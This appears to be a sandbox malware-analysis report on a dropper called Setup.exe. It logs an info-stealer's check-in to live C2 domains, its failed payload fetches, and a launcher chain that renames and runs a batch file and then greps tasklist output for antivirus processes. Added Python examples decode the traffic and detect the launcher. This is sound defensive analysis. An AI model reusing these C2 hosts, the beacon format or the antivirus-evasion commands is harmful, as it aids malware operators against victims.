  CF-RAY: 8f6c810598f44325-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1607&rtt_var=608&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2042&delivery_rate=1790312&cwnd=180&unsent_bytes=0&cid=1a126ccf4d0976dc&ts=925&x=0"
2024-12-24 00:34:09 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
  Data Ascii: fok 8.46.123.189
2024-12-24 00:34:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49749 | 188.114.97.64 | 443 | 7836 | C:\Users\user\AppData\Local\Temp\280366\Hc.com

Timestamp | Bytes transferred | Direction | Data
2024-12-24 00:34:10 UTC | 267 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 112
  Host: hungrypaster.click
2024-12-24 00:34:10 UTC | 112 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 30 45 30 44 45 44 41 34 34 38 41 31 38 43 36 37 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37
                                                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=0E0DEDA448A18C67165F70E3262EAA47
2024-12-24 00:34:11 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:11 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=r7d6ssiuo62ki35g1ni5ims08s; expires=Fri, 18 Apr 2025 18:20:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pC84yjOe0uofg6JdR22bH0G9ApneNMxfonSSnoQ0wTUDw3CRK4PepKJfQ6tCK07oSnQpDxM7FOrSy%2Fiyg%2BxRwkQHeFcA0rn%2F0xJZcAicDZMNWWiOB42roXC%2BTwcF8UCVuE7Qb2c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c81136a7241fb-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1604&rtt_var=610&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1015&delivery_rate=1782661&cwnd=181&unsent_bytes=0&cid=d627a6cbdd5345f3&ts=799&x=0"
2024-12-24 00:34:11 UTC | 218 | IN | Data Raw: 64 34 0d 0a 54 65 47 31 5a 75 79 47 65 35 2b 4d 34 34 45 76 61 30 76 79 4a 61 78 4d 51 2f 34 4f 4c 31 6d 7a 64 6d 44 54 36 47 45 59 59 6b 6f 57 6d 70 63 54 7a 72 78 5a 39 2f 69 58 38 56 78 52 46 39 31 35 67 79 49 6d 6a 32 63 42 4b 74 73 5a 45 49 2f 48 45 6e 77 46 49 44 53 55 77 54 72 44 39 67 6a 33 6f 70 66 35 57 30 6c 6e 30 45 50 59 62 6e 6e 4d 49 67 30 38 6b 55 78 52 72 73 51 61 4f 68 64 6f 64 38 50 64 45 70 6a 32 43 4b 58 51 7a 4e 30 41 41 43 65 62 56 64 67 6c 4f 59 38 67 58 44 48 63 42 6a 7a 38 67 51 39 73 50 53 6b 68 6b 65 6f 4b 69 50 51 6b 37 4f 53 43 72 31 73 54 50 39 41 4a 6a 69 6f 33 33 44 51 64 64 5a 45 54 51 75 6e 5a 48 45 55 3d 0d 0a
                                                                                                                                                                      Data Ascii: d4TeG1ZuyGe5+M44Eva0vyJaxMQ/4OL1mzdmDT6GEYYkoWmpcTzrxZ9/iX8VxRF915gyImj2cBKtsZEI/HEnwFIDSUwTrD9gj3opf5W0ln0EPYbnnMIg08kUxRrsQaOhdod8PdEpj2CKXQzN0AACebVdglOY8gXDHcBjz8gQ9sPSkhkeoKiPQk7OSCr1sTP9AJjio33DQddZETQunZHEU=
2024-12-24 00:34:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


Session ID:8
Source IP:192.168.2.4
Source Port:49750
Destination IP:172.67.169.205
Destination Port:443
PID:7836
Process:C:\Users\user\AppData\Local\Temp\280366\Hc.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 00:34:13 UTC | 199 | OUT | GET /sdgjyut/psh.txt HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Host: neqi.shop
2024-12-24 00:34:16 UTC | 947 | IN | HTTP/1.1 523
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:16 GMT
                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                      Content-Length: 15
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8pQIiCcZEC1SI0HluUphiZk5AAFWFpAJLq164%2Fr4K41zF9%2BKEO9sFmAKuo5vxGs2OySGsas%2BjkW3bDFMCu5wWNQiSFAtpVOCbIu%2BM%2FeVFYoUllZ4jTFk4ViqDk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c812148718c17-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1792&rtt_var=684&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=813&delivery_rate=1586956&cwnd=240&unsent_bytes=0&cid=e0c1e540c2348bac&ts=3591&x=0"
2024-12-24 00:34:16 UTC | 15 | IN | Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 33
                                                                                                                                                                      Data Ascii: error code: 523


Session ID:9
Source IP:192.168.2.4
Source Port:49751
Destination IP:104.21.84.113
Destination Port:443
PID:7836
Process:C:\Users\user\AppData\Local\Temp\280366\Hc.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 00:34:18 UTC | 207 | OUT | GET /int_clp_ldr_sha.txt HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Host: kliptizq.shop
2024-12-24 00:34:18 UTC | 554 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vwFdg4fgzq3zjggU7TCdcN%2BhanT5h9f%2FMI0NiQkIvLm%2FKI5zDYk5X4Y6kZdxLrj57n8WVjGPgcVFzWJ5XJLfT6qB0O7W%2B0MhuyL20q%2BT7asSbDUVc4zvtUhZ%2FmvZS53p"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c8140d9e27288-EWR
2024-12-24 00:34:18 UTC | 815 | IN | Data Raw: 31 31 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                      Data Ascii: 11d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-12-24 00:34:18 UTC | 1369 | IN | Data Raw: 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63
                                                                                                                                                                      Data Ascii: es/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('c
2024-12-24 00:34:18 UTC | 1369 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22
                                                                                                                                                                      Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="
2024-12-24 00:34:18 UTC | 1019 | IN | Data Raw: 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22
                                                                                                                                                                      Data Ascii: reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"
2024-12-24 00:34:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0
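
Of the three Hc.com sessions above, only session 7 completed: the POST to hungrypaster.click carries a form body with act, ver, lid, j and hwid, and the 200 reply is a single 0xd4-byte chunk of base64 text. The two follow-up GETs failed at Cloudflare's edge rather than at the origin application: neqi.shop answered 523 (Cloudflare could not reach the origin), and kliptizq.shop answered 403 with a Cloudflare block page that echoes the sandbox's egress address 8.46.123.189 in its footer, so whatever psh.txt and int_clp_ldr_sha.txt were meant to deliver was not captured in this run. The script below is an added example for this report and is not Joe Sandbox or LummaC code: it converts the report's "Data Raw" hex dumps back to bytes, strips the chunked transfer-encoding (tolerating the truncated captures a sandbox produces), parses the check-in body, and base64-decodes the reply. The hex strings are copied from the sessions above; the beacon heuristic (POST to /api whose body has exactly those five fields, with j and hwid as 32 hex digits) is this example's own assumption drawn from the one request captured here, not a vendor signature, and nothing is claimed about the decoded reply beyond its length.

```python
"""Decode the Hc.com HTTP sessions from the report's 'Data Raw' hex dumps.

Added example; not Joe Sandbox or LummaC code. Hex constants are copied from
the report. The beacon heuristic is an assumption based on one request.
"""
import base64
import re
from urllib.parse import parse_qs

# Session 7, 00:34:10, 112 bytes OUT: the form-encoded C2 request body.
C2_REQUEST_HEX = (
    "61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 "
    "6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 "
    "65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 "
    "32 64 26 68 77 69 64 3d 30 45 30 44 45 44 41 34 34 38 41 31 38 43 36 37 "
    "31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37"
)
# Session 7, 00:34:11, 218 bytes IN: one chunk (size 0xd4) of the C2 reply.
C2_REPLY_CHUNK_HEX = (
    "64 34 0d 0a 54 65 47 31 5a 75 79 47 65 35 2b 4d 34 34 45 76 61 30 76 79 "
    "4a 61 78 4d 51 2f 34 4f 4c 31 6d 7a 64 6d 44 54 36 47 45 59 59 6b 6f 57 "
    "6d 70 63 54 7a 72 78 5a 39 2f 69 58 38 56 78 52 46 39 31 35 67 79 49 6d "
    "6a 32 63 42 4b 74 73 5a 45 49 2f 48 45 6e 77 46 49 44 53 55 77 54 72 44 "
    "39 67 6a 33 6f 70 66 35 57 30 6c 6e 30 45 50 59 62 6e 6e 4d 49 67 30 38 "
    "6b 55 78 52 72 73 51 61 4f 68 64 6f 64 38 50 64 45 70 6a 32 43 4b 58 51 "
    "7a 4e 30 41 41 43 65 62 56 64 67 6c 4f 59 38 67 58 44 48 63 42 6a 7a 38 "
    "67 51 39 73 50 53 6b 68 6b 65 6f 4b 69 50 51 6b 37 4f 53 43 72 31 73 54 "
    "50 39 41 4a 6a 69 6f 33 33 44 51 64 64 5a 45 54 51 75 6e 5a 48 45 55 3d "
    "0d 0a"
)
# 5 bytes IN at the end of every session: the zero-length terminating chunk.
LAST_CHUNK_HEX = "30 0d 0a 0d 0a"
# Tail of the preceding session: a 15-byte chunk holding "ok <egress IP>".
OK_CHUNK_HEX = "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a"

# Assumption: the field set seen in the one captured check-in.
BEACON_FIELDS = frozenset({"act", "ver", "lid", "j", "hwid"})
HEX32 = re.compile(r"^[0-9A-Fa-f]{32}$")


def raw_to_bytes(hex_dump: str) -> bytes:
    """Turn a 'Data Raw' field (space-separated hex byte pairs) into bytes."""
    return bytes.fromhex(hex_dump.replace(" ", ""))


def decode_chunked(body: bytes) -> bytes:
    """Strip HTTP/1.1 chunked transfer-encoding: '<hex size>[;ext]\\r\\n<data>\\r\\n'
    repeated, ended by a zero-size chunk. A missing terminator is tolerated
    (captures are cut per chunk); a truncated chunk raises instead of
    returning partial data as if it were complete."""
    out, pos = bytearray(), 0
    while pos < len(body):
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("chunk size line not terminated")
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        if size == 0:
            break
        start = eol + 2
        if len(body) < start + size + 2:
            raise ValueError("truncated chunk")
        out += body[start:start + size]
        pos = start + size + 2
    return bytes(out)


def parse_beacon(body: bytes) -> dict:
    """Parse the form-encoded check-in; every field keeps its single value."""
    fields = parse_qs(body.decode("ascii"), keep_blank_values=True,
                      strict_parsing=True)
    return {k: v[0] for k, v in fields.items()}


def looks_like_beacon(method: str, path: str, body: bytes) -> bool:
    """Heuristic match for the captured check-in shape (see module docstring)."""
    if method != "POST" or path != "/api":
        return False
    try:
        f = parse_beacon(body)
    except (ValueError, UnicodeDecodeError):
        return False
    return (set(f) == BEACON_FIELDS and bool(HEX32.match(f["j"]))
            and bool(HEX32.match(f["hwid"]))
            and re.fullmatch(r"[a-z_]+", f["act"]) is not None)


def reply_payload(chunk_hex: str, last_hex: str = LAST_CHUNK_HEX) -> bytes:
    """Reassemble the chunked reply and base64-decode it. The result is opaque
    bytes; the report does not show what wraps them, so nothing more is said."""
    text = decode_chunked(raw_to_bytes(chunk_hex) + raw_to_bytes(last_hex))
    return base64.b64decode(text, validate=True)


if __name__ == "__main__":
    print(parse_beacon(raw_to_bytes(C2_REQUEST_HEX)))
    print(decode_chunked(raw_to_bytes(OK_CHUNK_HEX)))
    print(len(reply_payload(C2_REPLY_CHUNK_HEX)), "reply bytes after base64")
```

Run it as a script to see the parsed fields, or import it and feed other sessions' hex to decode_chunked; the only dependency is the standard library.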


                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:19:33:22
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:73'409'696 bytes
                                                                                                                                                                      MD5 hash:588EEB3D8F305FC008F034E10E0015C0
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:19:33:23
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:2
                                                                                                                                                                      Start time:19:33:23
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true
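
The launcher chain recorded here is Setup.exe starting cmd.exe with `/c move Clicks Clicks.cmd & Clicks.cmd`, which renames an extension-less dropped file to a batch script and runs it in the same command line, followed by a bare `tasklist` (the step behind the "Search for Antivirus process" signature). The detector below is an added example for this report, not Joe Sandbox or Sigma code: it runs over constructed process-creation records that mirror the Target ID 0 to 3 entries and flags (a) a cmd.exe rename-and-run command line and (b) a discovery tool started anywhere beneath such a launcher. The PIDs and the parent links in the sample records are this example's assumptions, since the report lists the processes but not which one spawned which, and the set of discovery tools is deliberately limited to what the report shows.

```python
"""Flag the rename-and-run launcher and discovery under it from process events.

Added example; not Joe Sandbox or Sigma code. Sample records mirror the
process list in the report; PIDs and parent links are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# cmd.exe /c move <src> <dst> & <dst>: the same token is moved to and then run.
RENAME_AND_RUN = re.compile(
    r'/c\s+move\s+"?(?P<src>[^\s"&]+)"?\s+"?(?P<dst>[^\s"&]+)"?\s*&\s*"?(?P=dst)"?',
    re.IGNORECASE,
)
SCRIPT_EXTS = (".cmd", ".bat")
DISCOVERY_TOOLS = {"tasklist.exe"}  # assumption: only what this report shows

# Constructed records mirroring Target ID 0-3 (PIDs and ppids are assumed).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Users\user\Desktop\Setup.exe",
              r'"C:\Users\user\Desktop\Setup.exe"'),
    ProcEvent(101, 100, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd'),
    ProcEvent(102, 101, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(103, 101, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    # Benign controls (constructed): a plain move, and tasklist from a shell.
    ProcEvent(200, 1, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c move report.txt archive\report.txt'),
    ProcEvent(201, 1, r"C:\Windows\System32\tasklist.exe", "tasklist /svc"),
]


def detect(events: list[ProcEvent]) -> list[tuple[str, int, str]]:
    """Return (rule, pid, detail) hits over a batch of process-creation events."""
    by_pid = {e.pid: e for e in events}
    hits: list[tuple[str, int, str]] = []
    launchers: set[int] = set()
    for e in events:
        if ntpath.basename(e.image).lower() != "cmd.exe":
            continue
        m = RENAME_AND_RUN.search(e.cmdline)
        if m and m.group("dst").lower().endswith(SCRIPT_EXTS):
            launchers.add(e.pid)
            hits.append(("rename_and_run_cmd", e.pid,
                         f"{m.group('src')} -> {m.group('dst')}"))
    for e in events:
        if ntpath.basename(e.image).lower() not in DISCOVERY_TOOLS:
            continue
        # Walk the parent chain; stop at an unknown parent or a cycle.
        seen, cur = set(), e.ppid
        while cur in by_pid and cur not in seen:
            if cur in launchers:
                hits.append(("discovery_under_launcher", e.pid,
                             f"{ntpath.basename(e.image)} under pid {cur}"))
                break
            seen.add(cur)
            cur = by_pid[cur].ppid
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(*hit)
```

The rename-and-run rule keys on the command line alone and would also fire on a hand-typed rename followed by execution; in practice pair it with the dropper's image path (here a file under the user's Desktop or %TEMP%) before paging anyone.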

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:19:33:25
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                      Imagebase:0x200000
                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:19:33:25
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                      Imagebase:0x130000
                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:19:33:25
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                      Imagebase:0x200000
                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:19:33:26
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                      Imagebase:0x130000
                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:19:33:26
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:cmd /c md 280366
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
